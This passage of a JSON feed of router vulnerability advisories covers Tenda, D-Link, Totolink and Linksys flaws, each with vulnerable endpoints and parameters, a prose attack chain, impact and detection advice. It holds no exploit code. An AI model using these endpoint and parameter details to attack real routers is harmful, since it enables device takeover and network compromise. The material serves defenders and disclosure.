allowing an attacker to potentially execute arbitrary code by manipulating the 'page' argument to the sub_427C3C function in the /goform/SafeMacFilter file.","title":"Tenda 4G300 Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-stack-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7289"}],"_cs_exploited":false,"_cs_products":["DIR-825M"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","router","dlink","cve"],"_cs_type":"advisory","_cs_vendors":["D-Link"],"content_html":"\u003cp\u003eA buffer overflow vulnerability exists in D-Link DIR-825M router version 1.1.12. The vulnerability is located within the \u003ccode\u003esub_414BA8\u003c/code\u003e function of the \u003ccode\u003e/boafrm/formWanConfigSetup\u003c/code\u003e file. An attacker can exploit this flaw by manipulating the \u003ccode\u003esubmit-url\u003c/code\u003e argument, leading to arbitrary code execution on the device. This vulnerability is remotely exploitable, and a proof-of-concept exploit is publicly available, increasing the risk of widespread attacks. Exploitation does not require authentication by default, and could allow an attacker to gain complete control over the device. This poses a significant threat to home and small business networks relying on this router model.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable D-Link DIR-825M router running firmware version 1.1.12.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/boafrm/formWanConfigSetup\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe attacker includes the \u003ccode\u003esubmit-url\u003c/code\u003e argument in the POST request, injecting a buffer overflow payload.\u003c/li\u003e\n\u003cli\u003eThe crafted payload overflows the buffer in the \u003ccode\u003esub_414BA8\u003c/code\u003e function during the processing of the \u003ccode\u003esubmit-url\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites critical memory regions, including the return address.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003esub_414BA8\u003c/code\u003e function returns, control is redirected to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s payload executes arbitrary code, potentially downloading and executing a secondary payload.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote shell access to the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability allows a remote attacker to execute arbitrary code on the D-Link DIR-825M router. This can lead to complete compromise of the device, allowing the attacker to eavesdrop on network traffic, modify router settings, or use the router as a botnet node for further malicious activities. Given the widespread use of D-Link routers in home and small business networks, a successful attack could compromise a large number of devices and networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available firmware updates from D-Link to patch CVE-2026-7289.\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect suspicious POST requests to \u003ccode\u003e/boafrm/formWanConfigSetup\u003c/code\u003e with overly long \u003ccode\u003esubmit-url\u003c/code\u003e parameters.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity related to the \u003ccode\u003e/boafrm/formWanConfigSetup\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T15:16:37Z","date_published":"2026-04-28T15:16:37Z","id":"/briefs/2026-04-dlink-buffer-overflow/","summary":"D-Link DIR-825M version 1.1.12 is vulnerable to a buffer overflow via manipulation of the submit-url argument in the /boafrm/formWanConfigSetup file's sub_414BA8 function, allowing a remote attacker to execute arbitrary code.","title":"D-Link DIR-825M Remote Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7151"}],"_cs_exploited":false,"_cs_products":["HG3"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7151","buffer-overflow","tenda","router"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been identified in Tenda HG3 version 2.0. The vulnerability exists within the \u003ccode\u003eformUploadConfig\u003c/code\u003e function of the \u003ccode\u003e/boaform/formIPv6Routing\u003c/code\u003e file. A remote attacker can exploit this by manipulating the \u003ccode\u003edestNet\u003c/code\u003e argument, potentially leading to arbitrary code execution on the device. The vulnerability, identified as CVE-2026-7151, has a publicly available exploit, increasing the risk of exploitation. This poses a significant threat to users of Tenda HG3 v2.0 routers, potentially allowing attackers to gain unauthorized access and control over the device. The CVSS v3.1 score is rated as 8.8 (HIGH).\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda HG3 v2.0 router with default or known credentials, or no authentication at all.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP POST request to \u003ccode\u003e/boaform/formIPv6Routing\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe request targets the \u003ccode\u003eformUploadConfig\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003edestNet\u003c/code\u003e argument within the HTTP POST data is manipulated with a string exceeding the buffer size.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformUploadConfig\u003c/code\u003e function processes the oversized \u003ccode\u003edestNet\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThis causes a stack-based buffer overflow, overwriting adjacent memory regions on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the device by overwriting the return address or other critical data on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker can then leverage this to gain full control of the device, potentially modifying settings, injecting malware, or using it as part of a botnet.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the affected Tenda HG3 v2.0 router. This could lead to complete compromise of the device, allowing the attacker to monitor network traffic, change router settings, or use the device as a launchpad for further attacks against other devices on the network. Given the potential for widespread exploitation due to the publicly available exploit, a large number of Tenda HG3 v2.0 users are at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for unusual POST requests to \u003ccode\u003e/boaform/formIPv6Routing\u003c/code\u003e with excessively long \u003ccode\u003edestNet\u003c/code\u003e parameters to detect potential exploit attempts (see example Sigma rule below).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting for requests to \u003ccode\u003e/boaform/formIPv6Routing\u003c/code\u003e to mitigate brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eApply available patches or firmware updates from Tenda to address CVE-2026-7151 on vulnerable HG3 2.0 devices.\u003c/li\u003e\n\u003cli\u003eConsider deploying a web application firewall (WAF) rule to filter out malicious requests targeting the \u003ccode\u003edestNet\u003c/code\u003e parameter in \u003ccode\u003e/boaform/formIPv6Routing\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T12:00:00Z","date_published":"2026-04-28T12:00:00Z","id":"/briefs/2026-04-tenda-hg3-overflow/","summary":"A stack-based buffer overflow vulnerability in the formUploadConfig function of Tenda HG3 v2.0's /boaform/formIPv6Routing file allows remote attackers to execute arbitrary code by manipulating the destNet argument.","title":"Tenda HG3 v2.0 Stack-Based Buffer Overflow in formUploadConfig","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-hg3-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7241"}],"_cs_exploited":false,"_cs_products":["A8000RU"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7241","command-injection","router"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA critical vulnerability, CVE-2026-7241, has been identified in Totolink A8000RU router firmware version 7.1cu.643_b20200521. This vulnerability resides within the CGI Handler component, specifically in the \u003ccode\u003esetWiFiBasicCfg\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. Successful exploitation allows a remote attacker to inject and execute arbitrary operating system commands by manipulating the \u003ccode\u003ewifiOff\u003c/code\u003e argument. The vulnerability has been publicly disclosed, increasing the risk of exploitation. This poses a significant threat to users of the affected router model, potentially leading to complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Totolink A8000RU router running firmware version 7.1cu.643_b20200521.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request targets the \u003ccode\u003esetWiFiBasicCfg\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious OS commands into the \u003ccode\u003ewifiOff\u003c/code\u003e argument of the HTTP request.\u003c/li\u003e\n\u003cli\u003eThe CGI handler processes the request without proper sanitization of the \u003ccode\u003ewifiOff\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed by the system with the privileges of the web server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote shell access or performs other malicious actions, such as modifying router settings.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary operating system commands on the affected Totolink A8000RU router. This can lead to complete compromise of the device, potentially enabling the attacker to eavesdrop on network traffic, modify router configuration, or use the router as a node in a botnet. Given the widespread use of Totolink routers, a successful attack could impact numerous home and small business networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Totolink A8000RU Command Injection Attempt\u0026rdquo; to your SIEM to identify exploitation attempts targeting the vulnerable endpoint.\u003c/li\u003e\n\u003cli\u003eApply the Sigma rule \u0026ldquo;Detect Suspicious CGI Request Arguments\u0026rdquo; to identify unusual commands in cgi requests.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e with suspicious characters or commands in the \u003ccode\u003ewifiOff\u003c/code\u003e parameter, as this is the attack vector described in CVE-2026-7241.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T09:17:41Z","date_published":"2026-04-28T09:17:41Z","id":"/briefs/2026-04-totolink-rce/","summary":"Totolink A8000RU version 7.1cu.643_b20200521 is vulnerable to OS command injection via manipulation of the `wifiOff` argument in the `setWiFiBasicCfg` function of the `/cgi-bin/cstecgi.cgi` CGI handler, allowing a remote attacker to execute arbitrary commands on the system.","title":"Totolink A8000RU OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7248"}],"_cs_exploited":false,"_cs_products":["DI-8100"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7248","buffer-overflow","d-link","router"],"_cs_type":"advisory","_cs_vendors":["D-Link"],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified as CVE-2026-7248, affects the D-Link DI-8100 router, specifically version 16.07.26A1. The vulnerability resides within the \u003ccode\u003etgfile_htm\u003c/code\u003e function of the \u003ccode\u003etgfile.htm\u003c/code\u003e file, a component of the CGI endpoint. By crafting a malicious request targeting the \u003ccode\u003efn\u003c/code\u003e argument, a remote, unauthenticated attacker can trigger a buffer overflow, potentially leading to arbitrary code execution. This vulnerability is particularly concerning as a proof-of-concept exploit has been publicly released, increasing the likelihood of exploitation. Routers are often targeted due to their exposure to the internet and the potential to compromise entire networks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable D-Link DI-8100 router running firmware version 16.07.26A1.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003etgfile.htm\u003c/code\u003e CGI endpoint.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes an overly long string in the \u003ccode\u003efn\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s web server processes the request and passes the \u003ccode\u003efn\u003c/code\u003e argument to the \u003ccode\u003etgfile_htm\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003etgfile_htm\u003c/code\u003e function fails to properly validate the length of the \u003ccode\u003efn\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eA buffer overflow occurs when the overly long \u003ccode\u003efn\u003c/code\u003e argument is copied into a fixed-size buffer.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites adjacent memory, potentially including return addresses or other critical data.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router, potentially allowing them to take full control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to remotely execute arbitrary code on the D-Link DI-8100 router. This could lead to a complete compromise of the device, allowing the attacker to intercept network traffic, modify router settings, or use the router as a launchpad for further attacks against other devices on the network. Given the public availability of an exploit, widespread exploitation is possible, potentially affecting numerous home and small business networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for abnormally long \u003ccode\u003efn\u003c/code\u003e parameters in requests to \u003ccode\u003e/tgfile.htm\u003c/code\u003e using the provided Sigma rule to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on HTTP requests to the router\u0026rsquo;s web interface to mitigate brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eSince the source material only identifies a vulnerability, without a patch, consider replacing the affected device.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T09:16:18Z","date_published":"2026-04-28T09:16:18Z","id":"/briefs/2026-04-dlink-di-8100-bo/","summary":"A buffer overflow vulnerability in the D-Link DI-8100 router allows remote attackers to execute arbitrary code by manipulating the 'fn' argument in the tgfile_htm function of the CGI endpoint.","title":"D-Link DI-8100 Remote Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-di-8100-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7240"}],"_cs_exploited":false,"_cs_products":["A8000RU 7.1cu.643_b20200521"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7240","command-injection","totolink","router","cgi"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA critical vulnerability, CVE-2026-7240, has been identified in Totolink A8000RU router firmware version 7.1cu.643_b20200521. This flaw resides within the CGI Handler component, specifically in the \u003ccode\u003esetVpnAccountCfg\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. By exploiting this vulnerability, a remote attacker can inject arbitrary operating system commands by manipulating the \u003ccode\u003eUser\u003c/code\u003e argument. Publicly available exploit code exists, increasing the risk of widespread exploitation. This vulnerability poses a significant threat as it allows complete control of the affected device, potentially leading to network compromise and data exfiltration.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Totolink A8000RU router running firmware version 7.1cu.643_b20200521 accessible via the web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes the \u003ccode\u003esetVpnAccountCfg\u003c/code\u003e function call with a payload injected into the \u003ccode\u003eUser\u003c/code\u003e argument. The payload contains OS commands to be executed on the router.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s CGI Handler processes the request without proper sanitization of the \u003ccode\u003eUser\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote shell access to the router.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised router to pivot within the network, potentially accessing sensitive data or other internal systems.\u003c/li\u003e\n\u003cli\u003eThe attacker could modify the router\u0026rsquo;s configuration, intercept network traffic, or use it as a launching point for further attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7240 allows a remote, unauthenticated attacker to execute arbitrary commands on the affected Totolink A8000RU router. This could lead to a complete compromise of the device, potentially exposing sensitive information, enabling unauthorized network access, and facilitating further attacks within the network. Given the ease of exploitation and the availability of public exploits, organizations using this router model are at high risk of experiencing significant security breaches.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Totolink A8000RU Command Injection Attempt\u003c/code\u003e to identify exploitation attempts against vulnerable Totolink routers. Enable webserver logging to capture the necessary request data.\u003c/li\u003e\n\u003cli\u003eApply the Sigma rule \u003ccode\u003eDetect Totolink A8000RU Malicious User Agent\u003c/code\u003e to detect potential exploit attempts based on modified User-Agent headers.\u003c/li\u003e\n\u003cli\u003eMonitor webserver logs for requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e containing suspicious characters or command sequences in the \u003ccode\u003ecs-uri-query\u003c/code\u003e field, indicative of command injection attempts.\u003c/li\u003e\n\u003cli\u003eGiven the public availability of exploit code, organizations using the Totolink A8000RU 7.1cu.643_b20200521 are advised to replace the device if a patch is not available from the vendor.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T08:16:02Z","date_published":"2026-04-28T08:16:02Z","id":"/briefs/2026-04-totolink-cmd-injection/","summary":"CVE-2026-7240 is a critical OS command injection vulnerability in the Totolink A8000RU router that allows remote attackers to execute arbitrary commands by manipulating the 'User' argument in the 'setVpnAccountCfg' function.","title":"Totolink A8000RU OS Command Injection Vulnerability (CVE-2026-7240)","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-7219"}],"_cs_exploited":false,"_cs_products":["N300RT"],"_cs_severities":["high"],"_cs_tags":["buffer-overflow","iot","router","cve-2026-7219"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA buffer overflow vulnerability, identified as CVE-2026-7219, has been discovered in Totolink N300RT router firmware version 3.4.0-B20250430. The vulnerability resides within the \u003ccode\u003e/boafrm/formIpQoS\u003c/code\u003e file and is triggered by manipulating the \u003ccode\u003eentry_name\u003c/code\u003e argument. An attacker can exploit this flaw remotely to potentially execute arbitrary code on the device. Publicly available exploit code exists, increasing the risk of exploitation. This vulnerability poses a significant threat to devices running the affected firmware, potentially allowing attackers to gain unauthorized access and control over the router.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a Totolink N300RT device running firmware version 3.4.0-B20250430.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/boafrm/formIpQoS\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a payload designed to overflow the buffer associated with the \u003ccode\u003eentry_name\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s web server processes the malicious request, leading to a buffer overflow condition.\u003c/li\u003e\n\u003cli\u003eThe attacker overwrites adjacent memory regions, potentially including return addresses or other critical data.\u003c/li\u003e\n\u003cli\u003eUpon function return, the overwritten return address is used, diverting execution flow to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the device.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use this access to modify router settings, intercept network traffic, or establish a persistent backdoor.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the Totolink N300RT device. This could lead to complete compromise of the router, enabling attackers to monitor network traffic, change DNS settings, or use the device as part of a botnet. Given the number of Totolink N300RT devices deployed, this vulnerability could have a widespread impact, especially for home and small business users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests targeting \u003ccode\u003e/boafrm/formIpQoS\u003c/code\u003e with unusually long \u003ccode\u003eentry_name\u003c/code\u003e parameters to detect potential exploitation attempts. Implement the Sigma rule \u003ccode\u003eDetect Suspicious Totolink FormIpQoS Requests\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eApply firmware updates as soon as they are released by Totolink to patch CVE-2026-7219.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router on other devices on the network.\u003c/li\u003e\n\u003cli\u003eConsider using a web application firewall (WAF) to filter out malicious requests targeting the router\u0026rsquo;s web interface and activate the \u003ccode\u003eDetect Large POST Requests to Router Config Pages\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T04:16:23Z","date_published":"2026-04-28T04:16:23Z","id":"/briefs/2026-04-totolink-n300rt-bo/","summary":"A remote buffer overflow vulnerability exists in Totolink N300RT 3.4.0-B20250430 via manipulation of the 'entry_name' argument in the /boafrm/formIpQoS file, potentially leading to arbitrary code execution.","title":"Totolink N300RT Buffer Overflow Vulnerability (CVE-2026-7219)","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-n300rt-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7101"}],"_cs_exploited":false,"_cs_products":["F456 (1.0.0.5)"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7101","buffer-overflow","router","tenda","remote-code-execution"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified as CVE-2026-7101, has been discovered in Tenda F456 router version 1.0.0.5. The vulnerability resides in the \u003ccode\u003efromWrlclientSet\u003c/code\u003e function within the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e file, which is part of the router\u0026rsquo;s httpd component. Successful exploitation allows remote attackers to execute arbitrary code on the device. Publicly available exploit code exists, increasing the risk of widespread exploitation. This vulnerability poses a significant threat to home and small business networks using the affected Tenda router model, potentially leading to complete device compromise and unauthorized network access. The vulnerability was published on 2026-04-27 and is tracked by VulDB.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable Tenda F456 router running firmware version 1.0.0.5.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes an oversized payload designed to overflow the buffer in the \u003ccode\u003efromWrlclientSet\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e process attempts to process the request without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow occurs, overwriting adjacent memory regions, including critical program data and execution pointers.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the program execution flow.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially including shell commands or custom malware.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves complete control of the router, potentially enabling network reconnaissance, data exfiltration, or further attacks on the local network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability allows a remote attacker to execute arbitrary code on the Tenda F456 router. This can lead to complete device compromise, allowing the attacker to control network traffic, modify router settings, or use the compromised device as a pivot point for further attacks within the network. Given the wide usage of Tenda routers in home and small business environments, a successful widespread exploitation could impact thousands of users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to a patched firmware version if available from the vendor.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity targeting the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e endpoint using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement an IPS rule to detect and block exploit attempts targeting CVE-2026-7101.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-27T09:19:31Z","date_published":"2026-04-27T09:19:31Z","id":"/briefs/2026-04-tenda-f456-buffer-overflow/","summary":"A buffer overflow vulnerability in Tenda F456 version 1.0.0.5 allows remote attackers to execute arbitrary code via a crafted request to the fromWrlclientSet function in the /goform/WrlclientSet file of the httpd component.","title":"Tenda F456 Router Buffer Overflow Vulnerability (CVE-2026-7101)","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-f456-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7081"}],"_cs_exploited":false,"_cs_products":["F456"],"_cs_severities":["critical"],"_cs_tags":["cve","buffer_overflow","router"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified as CVE-2026-7081, affects Tenda F456 router version 1.0.0.5. The vulnerability resides in the \u003ccode\u003efromGstDhcpSetSer\u003c/code\u003e function within the \u003ccode\u003e/goform/GstDhcpSetSer\u003c/code\u003e file, a component of the device\u0026rsquo;s httpd service. Successful exploitation allows a remote attacker to execute arbitrary code on the device. Publicly available exploit code increases the risk of widespread exploitation. This vulnerability poses a significant threat as it can lead to complete compromise of the affected device, potentially allowing attackers to gain unauthorized access to the network, steal sensitive information, or use the device as part of a botnet.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda F456 router (version 1.0.0.5) exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/GstDhcpSetSer\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request includes the \u003ccode\u003edips\u003c/code\u003e argument, which is intentionally oversized to trigger the buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003efromGstDhcpSetSer\u003c/code\u003e function processes the request without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003edips\u003c/code\u003e argument overwrites adjacent memory regions on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflow to overwrite the return address with an address pointing to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromGstDhcpSetSer\u003c/code\u003e function returns, causing execution to jump to the attacker\u0026rsquo;s code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s code executes with the privileges of the httpd process, potentially leading to full device compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the affected Tenda F456 router. This can result in complete device compromise, including the ability to modify device settings, intercept network traffic, and potentially use the compromised device as a pivot point for further attacks within the network. Given the widespread use of Tenda routers, a large number of devices could be vulnerable, making this a significant security concern.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/GstDhcpSetSer\u003c/code\u003e with unusually long \u003ccode\u003edips\u003c/code\u003e parameter values to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u003ccode\u003eDetect Tenda F456 Buffer Overflow Attempt\u003c/code\u003e to identify malicious HTTP requests.\u003c/li\u003e\n\u003cli\u003eSince no patch is available, consider replacing the affected Tenda F456 routers (version 1.0.0.5) with more secure alternatives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-27T04:16:09Z","date_published":"2026-04-27T04:16:09Z","id":"/briefs/2026-04-tenda-f456-bo/","summary":"A buffer overflow vulnerability exists in Tenda F456 version 1.0.0.5 in the `fromGstDhcpSetSer` function, allowing remote attackers to execute arbitrary code by manipulating the 'dips' argument via a crafted HTTP request to `/goform/GstDhcpSetSer`.","title":"Tenda F456 Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-f456-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-6992"}],"_cs_exploited":false,"_cs_products":["MR9600 (2.0.6.206937)"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6992","command-injection","router","rce"],"_cs_type":"advisory","_cs_vendors":["Linksys"],"content_html":"\u003cp\u003eA command injection vulnerability, 